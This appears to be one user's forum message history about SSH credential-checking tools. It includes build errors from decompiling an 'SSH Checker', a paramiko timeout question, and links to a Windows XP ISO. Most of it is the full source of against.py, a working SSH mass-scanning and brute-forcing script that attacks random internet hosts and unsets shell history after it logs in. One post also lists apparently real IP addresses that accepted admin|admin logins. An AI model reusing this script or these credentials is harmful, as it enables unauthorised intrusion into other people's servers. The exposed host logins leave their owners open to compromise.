Messages - qespresso

1
Hi mates :),
I tried to modify some parameters in a piece of software that uses C# .NET 4, so I decided to use .NET Reflector to decompile it. There were no errors during decompiling with .NET Reflector.
After I got the source code I tried to build it again, but errors appeared.
With my limited experience in reverse engineering, I would like to ask if you can help me solve this problem.
The following is the software I tried to decompile (attached in this post).
And these are the errors that appear:
Code: (C) [Select]
Error 2 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 614 22 Lazy SSH - Checker-kai
Error 5 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 32 Lazy SSH - Checker-kai
Error 7 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 634 89 Lazy SSH - Checker-kai
Error 10 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 34 Lazy SSH - Checker-kai
Error 12 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 650 91 Lazy SSH - Checker-kai
Error 14 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 658 89 Lazy SSH - Checker-kai
Error 16 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 670 22 Lazy SSH - Checker-kai
Error 18 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 687 89 Lazy SSH - Checker-kai
Error 20 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 22 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 24 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 26 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 28 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 1 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 614 16 Lazy SSH - Checker-kai
Error 4 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 26 Lazy SSH - Checker-kai
Error 6 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 634 72 Lazy SSH - Checker-kai
Error 9 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 28 Lazy SSH - Checker-kai
Error 11 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 650 74 Lazy SSH - Checker-kai
Error 13 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 658 72 Lazy SSH - Checker-kai
Error 15 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 670 16 Lazy SSH - Checker-kai
Error 17 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 687 72 Lazy SSH - Checker-kai
Error 19 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 21 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 23 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 25 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 27 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 3 Unexpected character '\u0024' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 20 Lazy SSH - Checker-kai
Error 8 Unexpected character '\u0024' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 22 Lazy SSH - Checker-kai
Error 97 The type name 'Class7' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 142 16 Lazy SSH - Checker-kai
Error 98 The type name 'Class7' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 142 45 Lazy SSH - Checker-kai
Error 75 The type name 'Class6' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 64 16 Lazy SSH - Checker-kai
Error 76 The type name 'Class6' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 64 45 Lazy SSH - Checker-kai
Error 102 The name 'b__8' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 95 The name 'b__2' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 90 The name 'b__1' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 85 The name 'b__0' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 81 The name '__this' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 27 Lazy SSH - Checker-kai
Error 77 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 7 Lazy SSH - Checker-kai
Error 78 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 13 Lazy SSH - Checker-kai
Error 79 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 80 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 26 Lazy SSH - Checker-kai
Error 82 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 62 Lazy SSH - Checker-kai
Error 83 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 69 Lazy SSH - Checker-kai
Error 84 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 86 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 87 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 68 Lazy SSH - Checker-kai
Error 88 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 75 Lazy SSH - Checker-kai
Error 89 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 91 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 92 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 68 Lazy SSH - Checker-kai
Error 93 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 75 Lazy SSH - Checker-kai
Error 94 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 96 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 99 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 62 Lazy SSH - Checker-kai
Error 100 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 69 Lazy SSH - Checker-kai
Error 101 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 103 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 41 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 43 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 88 Lazy SSH - Checker-kai
Error 51 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 53 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 94 Lazy SSH - Checker-kai
Error 61 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 63 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 94 Lazy SSH - Checker-kai
Error 71 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 73 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 88 Lazy SSH - Checker-kai
Error 29 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 31 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 35 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 38 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 45 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 48 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 55 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 58 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 65 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 68 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 30 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 36 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 46 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 56 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 66 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 32 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 33 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 26 Lazy SSH - Checker-kai
Error 34 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 27 Lazy SSH - Checker-kai
Error 37 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 69 Lazy SSH - Checker-kai
Error 39 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 40 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 42 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 44 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 88 Lazy SSH - Checker-kai
Error 47 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 75 Lazy SSH - Checker-kai
Error 49 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 50 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 52 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 54 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 94 Lazy SSH - Checker-kai
Error 57 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 75 Lazy SSH - Checker-kai
Error 59 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 60 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 62 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 64 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 94 Lazy SSH - Checker-kai
Error 67 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 69 Lazy SSH - Checker-kai
Error 69 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 70 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 72 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 74 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 88 Lazy SSH - Checker-kai


2
Hi again in this topic,
paramiko supports a timeout in the connect() function, and it is of course used in the script from our topic:
Code: (python) [Select]
      ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
But when I tried to execute it, it hangs badly even though I already set the "timeout" parameter, especially when the script detects a host with a response like this:
Code: (python) [Select]
74.42.179.47|admin|admin  > session terminated due to idle timeout (600 seconds)
184.12.232.241|admin|admin  > session terminated due to idle timeout (600 seconds)
200.105.185.201|admin|admin  > session terminated due to idle timeout (600 seconds)
Could anyone give me a suggestion on how to skip these hosts (since "timeout" doesn't work)?

3
Hacking and Security / Re: Windows XP
« on: June 10, 2014, 04:55:22 AM »
I have no idea about cookies in our forum, but I have some good and fast links for you (from the original MSDN source):

en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso
https://docs.google.com/file/d/0B8Q57M1j2bO7MHFGd29YbGE1bGM/edit?pli=1

The same ISO file, but on another file host (6 parts):
https://onedrive.live.com/?cid=B9F475D15345B40D&id=B9F475D15345B40D%21246

4
The program loops over all the users and all the passwords from the txt file:
Code: [Select]
        for user in users:
            for password in passwords:
I just need to check some user|pass login pairs like:
Code: [Select]
admin|admin
test|test
ubnt|ubnt

P.S. I already found the solution recently. I tried using the split() function and it works like a charm. Thank you very much for your attention to my topic :)


5
To whom it may concern,
I'm looking for an ssh brute-force script that runs on Linux. From many sources on the internet I found that there are some solutions for that, like THC Hydra, Medusa or Ncrack. But these programs have some performance problems, since they have many features for many services.
I tried SSHtrix from http://noptrix.net/codes.html; it works well but is still slow.
The one that fits my needs was against.py from http://nullsecurity.net/tools/cracker.html
Here is the code of this cool script:
Code: (python) [Select]
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# against.py - mass scanning and brute-forcing script for ssh                  #
#                                                                              #
# FILE                                                                         #
# against.py                                                                   #
#                                                                              #
# DATE                                                                         #
# 2014-02-27                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# 'against.py' is a very fast ssh attacking script which includes a            #
# multithreaded port scanning module (tcp connect) for discovering possible    #
# targets and a multithreaded brute-forcing module which attacks               #
# parallel all discovered hosts or given ip addresses from a list.             #
#                                                                              #
# AUTHOR                                                                       #
# pgt - http://www.nullsecurity.net/                                           #
#                                                                              #
# TODO                                                                         #
# - keyboard-interactive handler                                               #
# - scan ip address ranges randomly                                            #
#                                                                              #
# CHANGELOG                                                                    #
# v0.2                                                                         #
# - prints kernel version after login                                          #
# - optimized timings when cracking                                            #
# - detection for key authentication                                           #
# - false positive / small honeypot detection                                  #
# - save found target ip addresses to file, -O option                          #
# - 127.x.x.x will be excluded when scanning for random ip addresses           #
# - unsort found target ip addresses, because of sequential port scanning      #
# - resolve ip address by given hostname                                       #
# - stop attacks on target when keyboard-interactive is required               #
# - set threads for port scanning, -s option                                   #
#                                                                              #
################################################################################


from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
import re


# version of against.py
VERSION = 'v0.2'


# print our nice banner ;)
def banner():
    print '--==[ against.py by pgt@nullsecurity.net ]==--'

# print version
def version():
    print '[+] against.py %s' % (VERSION)
    sys.exit(0)

# check if we can write to file
def test_file(filename):
    try:
        outfile = open(filename, 'a')
        outfile.close()
    except IOError:
        print '[!] ERROR: cannot write to file \'%s\'' % filename
        sys.exit(1)

# define command line parameters and help page
def argspage():
    parser = argparse.ArgumentParser(
    usage = '\n\n   ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
    formatter_class = argparse.RawDescriptionHelpFormatter,
    epilog =
    'examples:\n\n'

    '  attack single target\n'
    '  usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'

    '  scanning and attacking an ip-range\n'
    '  usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
    add_help = False
    )

    options = parser.add_argument_group('options', '')
    options.add_argument('-i', default=False, metavar='<ip/range>',
            help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
    options.add_argument('-I', default=False, metavar='<file>',
            help='list of targets')
    options.add_argument('-r', default=False, metavar='<num>',
            help='attack random hosts')
    options.add_argument('-p', default=22, metavar='<num>',
            help='port number of sshd (default: 22)')
    options.add_argument('-t', default=4, metavar='<num>',
            help='threads per host (default: 4)')
    options.add_argument('-f', default=8, metavar='<num>',
            help='attack max hosts parallel (default: 8)')
    options.add_argument('-u', default='root', metavar='<username>',
            help='single username (default: root)')
    options.add_argument('-U', default=False, metavar='<file>',
            help='list of usernames')
    options.add_argument('-l', default='toor', metavar='<password>',
            help='single password (default: toor)')
    options.add_argument('-L', default=False, metavar='<file>',
            help='list of passwords')
    options.add_argument('-o', default=False, metavar='<file>',
            help='write found logins to file')
    options.add_argument('-O', default=False, metavar='<file>',
            help='write found target ip addresses to file')
    options.add_argument('-s', default=200, metavar='<num>',
            help='threads when port scanning (default: 200)')
    options.add_argument('-T', default=3, metavar='<sec>',
            help='timeout in seconds (default: 3)')
    options.add_argument('-V', action='store_true',
            help='print version of against.py and exit')

    args = parser.parse_args()

    if args.V:
        version()

    if (args.i == False) and (args.I == False) and (args.r == False):
        print ''
        parser.print_help()
        sys.exit(0)

    return args

# write found ip addresses / logins to file
def write_to_file(filename, text):
    outfile = open(filename, 'a')
    outfile.write(text)
    outfile.close()

# connect to target and checks for an open port
def scan(target, port, timeout, oips):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)
    result = sock.connect_ex((target, port))
    sock.close()
    if result == 0:
        HOSTLIST.append(target)
        if oips:
            write_to_file(oips, target + '\n')

# control the maximum number of threads
def active_threads(threads, waittime):
    while threading.activeCount() > threads:
        time.sleep(waittime)

# create thread and call scan()
def thread_scan(args, target):
    port = int(args.p)
    timeout = float(args.T)
    oips = args.O
    threads = int(args.s)

    bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
    bam.start()

    active_threads(threads, 0.0001)
    time.sleep(0.001)

# only the output when scanning for targets
def scan_output(i):
    sys.stdout.flush()
    sys.stdout.write('\r[*] hosts scanned: {0} | ' \
            'possible to attack: {1}'.format(i, len(HOSTLIST)))

# handle format of given target(s)
def check_targets(targets):
    if re.match(r'^[0-9.\-]*$', targets):
        return targets
    try:
        target = gethostbyname(targets)
        return target
    except gaierror:
        print '[-] \'%s\' is unreachable' % (targets)
        finished()
        sys.exit(1)

# unsort found hosts, because of incremental scanning
def unsort_hostlist():
    print '[*] unsort host list'
    for i in range(15):
        random.shuffle(HOSTLIST)

# handle ip range format from command line
def handle_ip_range(iprange):
    parted = tuple(part for part in iprange.split('.'))

    rsa = range(4)
    rsb = range(4)
    for i in range(4):
        hyphen = parted[i].find('-')
        if hyphen != -1:
            rsa[i] = int(parted[i][:hyphen])
            rsb[i] = int(parted[i][1+hyphen:]) + 1
        else:
            rsa[i] = int(parted[i])
            rsb[i] = int(parted[i]) + 1

    return (rsa, rsb)

# call thread_scan() with target ip addresses
def ip_range(args):
    targets = check_targets(args.i)
    rsa, rsb = handle_ip_range(targets)

    print '[*] scanning %s for ssh services' % targets
    counter = 0
    for i in range(rsa[0], rsb[0]):
        for j in range(rsa[1], rsb[1]):
            for k in range(rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    target = '%d.%d.%d.%d' % (i, j, k, l)
                    counter += 1
                    scan_output(counter)
                    thread_scan(args, target)

    # waiting for the last running threads
    active_threads(1, 0.1)

    scan_output(counter)
    print '\n[*] finished scan'

# create ip addresses
def randip():
    rand = range(4)
    for i in range(4):
        rand[i] = random.randrange(0, 256)

    # exclude 127.x.x.x
    if rand[0] == 127:
        randip()

    ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
    return ipadd

# create random ip addresses
def rand_ip(args):
    i = 0
    print '[*] scanning random ips for ssh services'
    while len(HOSTLIST) < int(args.r):
        i += 1
        scan_output(i)
        thread_scan(args, randip())

    # waiting for the last running threads
    active_threads(1, 1)

    scan_output(i)
    print '\n[*] finished scan.'

# checks if given filename by parameter exists
def file_exists(filename):
    try:
        open(filename).readlines()
    except IOError:
        print '[!] ERROR: cannot open file \'%s\'' % filename
        sys.exit(1)

# read-in a file with ip addresses
def ip_list(ipfile):
    file_exists(ipfile)
    targets = open(ipfile).readlines()
    for target in targets:
        HOSTLIST.append(target)

# connect to target and try to login
def crack(target, port, user, passwd, outfile, timeo, i):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    user = user.replace('\n', '')
    passwd = passwd.replace('\n', '')
    try:
        ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
        time.sleep(3)
        try:
            ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
            time.sleep(1)
            ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
                    '|| cat /proc/version')
            output = 'kernel: %s' \
                    % (ssh_stdout.readlines()[0].replace('\n', ''))
        except:
            output = 'info: maybe a honeypot or false positive'
        login = '[+] login found for %s | %s:%s\n' \
                '[!] %s' % (target, user, passwd, output)
        print login
        if outfile:
            write_to_file(outfile, login + '\n')
        ssh.close()
        os._exit(0)
    except paramiko.AuthenticationException, e:
        ssh.close()
        exception = str(e)
        if '[\'publickey\']' in exception:
            print '[-] key authentication only - ' \
                'stopped attack against %s' % (target)
            os._exit(1)
        elif '\'keyboard-interactive\'' in exception:
            print '[-] %s requires \'keyboard-interactive\' handler' % (target)
            os._exit(1)
    except:
        ssh.close()
        # after 3 timeouts per request the attack against $target will stopped
        if i < 3:
            i += 1
            # reconnect after random seconds (between 0.6 and 1.2 sec)
            randtime = random.uniform(0.6, 1.2)
            time.sleep(randtime)
            crack(target, port, user, passwd, outfile, timeo, i)
        else:
            print '[-] too many timeouts - stopped attack against %s' % (target)
            os._exit(1)

# create 'x' number of threads and call crack()
def thread_it(target, args):
    port = int(args.p)
    user = args.u
    userlist = args.U
    password = args.l
    passlist = args.L
    outfile = args.o
    timeout = float(args.T)
    threads = int(args.t)

    if userlist:
        users = open(userlist).readlines()
    else:
        users = [user]
    if passlist:
        passwords = open(passlist).readlines()
    else:
        passwords = [password]

    # try/except looks dirty but we need it :/
    try:
        for user in users:
            for password in passwords:
                Run = threading.Thread(target=crack, args=(target, port, user,
                    password, outfile, timeout, 0,))
                Run.start()
                # checks that we a max number of threads
                active_threads(threads, 0.01)
                time.sleep(0.1)
        # waiting for the last running threads
        active_threads(1, 1)
    except KeyboardInterrupt:
        os._exit(1)

# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
    threads = int(args.t)
    childs = int(args.f)
    len_hosts = len(HOSTLIST)

    print '[*] attacking %d target(s)\n' \
            '[*] cracking up to %d hosts parallel\n' \
            '[*] threads per host: %d' % (len_hosts, childs, threads)

    i = 1
    for host in HOSTLIST:
        host = host.replace('\n', '')
        print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
        hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
        hostfork.start()
        # checks that we have a max number of childs
        while len(multiprocessing.active_children()) >= childs:
            time.sleep(0.001)
        time.sleep(0.001)
        i += 1

    # waiting for child processes
    while multiprocessing.active_children():
        time.sleep(1)

# \(0.o)/
def empty_hostlist():
    if len(HOSTLIST) == 0:
        print '[-] found no targets to attack!'
        finished()
        sys.exit(1)

# output when against.py finished all routines
def finished():
    print '[*] game over!!!'

def main():
    banner()
    args = argspage()

    if args.U:
        file_exists(args.U)
    if args.L:
        file_exists(args.L)
    if args.o:
        test_file(args.o)
    if args.O:
        test_file(args.O)

    if args.i:
        ip_range(args)
        unsort_hostlist()
    elif args.I:
        ip_list(args.I)
    else:
        rand_ip(args)

    time.sleep(0.1)
    empty_hostlist()
    fork_it(args)
    finished()

if __name__ == '__main__':
    HOSTLIST = []
    try:
